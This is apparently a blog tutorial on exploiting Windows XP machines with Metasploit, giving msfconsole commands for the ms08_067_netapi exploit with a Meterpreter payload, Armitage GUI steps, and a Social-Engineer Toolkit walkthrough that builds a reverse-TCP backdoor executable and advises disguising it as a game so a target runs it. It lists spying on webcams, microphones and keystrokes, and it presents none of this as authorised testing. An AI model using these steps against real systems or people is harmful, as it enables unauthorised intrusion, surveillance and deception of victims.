To exploit a system using the Metasploit Framework you carry out 5 steps:
1. Choose then configuring a pre loaded exploit in the database.
2. Check to see if the target system is susceptible to the exploit.
3. Configuring a payload
4. Encode the payload in order to hide it from an intrusion-prevention system (IPS)
5. Execute the exploit.
In order for you to choose an exploit and a payload, information about the target is required. There are many ways to gain this information from port scanning and OS fingerprinting tools such as Nmap or vulnerability scanners such as Nessus. I’ll leave your method of information gathering up to you.
Installation of the Metasploit framework is dependant on your Operating System and hardware therefore rather than list the ways to install to save covering all eventualities I have provided a link to both windows and Linux installations:
Linux : LINK…
I would however highly recommend that you download Kali-Linux which comes with Metasploit Pro already installed.
Metasploit is a great tool and a must have for all secutiry/penetration testers. I will show you a few ways in which metasploit can be used to exploit a target machine. (All my examples are done using Metasploit on Kali-Linux exploiting a Windows XP SP3 OS)
How to connect and exploit a target machine using Metasploit Exploit ms08_067_netapi. So first of lets boot up a version of Metasploit, with the cmd msfconsole:
Now we need to setup our windows exploit with the following commands:
1. use exploit/windows/smb/ms08_067_netapi
2. set payload windows/meterpreter/bind_tcp
3. set RHOST 192.168.0.10 (This IP Address will be your targets IP gained from a scan)
4. exploit (This command carries out the exploit as seen below)
All being well you should have connected to the target and carry out a number of commands. Below is the screenshot command.
And thats it easy!!
There are loads of commands to run under this exploit, just type help and a list will be displayed.
Examples are: Recording audio from microphones, screenshots from their webcam, gathering keystrokes and downloading files.
Social engineering example
Next lets see how to gain access to a targets machine using their interaction. Why? I hear you ask, well sometimes its not possible to connect directly for whatever reason lets say “security settings”. The following exploit uses the targets interaction to help us gain access.
So first things first bring up a terminal window and type the command: se-toolkit
Then enter option 1 for social engineering attacks
Now option 4 to create a payload and listener and enter your IP Address.
Now you need to pick the type of payload, we will go with option 2 – Windows Reverse TCP Meterpreter.
Choose option 16 – Backdoor Executable
Leave the port set to 443
(This port is used for secure web browser communication. Data transferred across such connections are highly resistant to eavesdropping and interception which is iroic concidering what we are using it for lol)
And finally start the listener.
Ok so lets recap, we have just created an executable file with a payload hidden within. The next part is a little tricky you need to send the file to the target computer and get them to execute it. For example call it games and give it a nice icon lol.
Before you send the file navigate to were it was created and right click and properties.
Tick the box to allow the file to be executed as a program
So now we wait….. once the target executes the program you will get the following:
From here on in its the usual Meterpreter > prompt
As before you can now run commands like screenshot or shell.
The target is yours!
We’ve seen how to use Metasploit via the command line now lets see how to use a graphical version Armitage that lets us achieve the same goal.
Armitage is a GUI way of using metasploit/meterpreter rather than cmd line so lets get started.
First navigate to Applications > Kali Linux > System Services > Metasploit > community / pro start …… this will start the server/database
Then type armitage in the terminal window and accept the default values:
You will probably get a popup asking to start metasploit, click yes
you should now see the following:
Dont worry about the connection refused it just takes a while to load.
Now armitage will boot up if it asks you for the attack computer IP enter your IP Address.
Navigate to the Hosts tab > Nmap Scan > Quick Scan (OS Detect)
From here armitage will scan a range or a sigle IP Address of your choice then present it in the black window. Right click the target and click Scan
When the scan is complete expand the exploit > windows > smb and double click the ms08_67_netapi
This will bring up an attack confirmation window check the details and click launch
Confirmation of a successful exploit will look like this:
You can now right click the target and perform multiple commands
here is an example of the Interact “remote command shell”
As an added extra Websploit (below) uses exploits from Metasploit and has its own features as well which is used to scan and analysis remote systems in order to find vulnerabilites. If you enjoyed this article please comment and i will do one for Websploit. Thank you.
Metasploit is a must have for anyone interested in the world of secutiry, you have just seen a few ways in which it can be used however keep in mind that this has only scratched the surface of the potential of this tool. To find out more please follow the links below.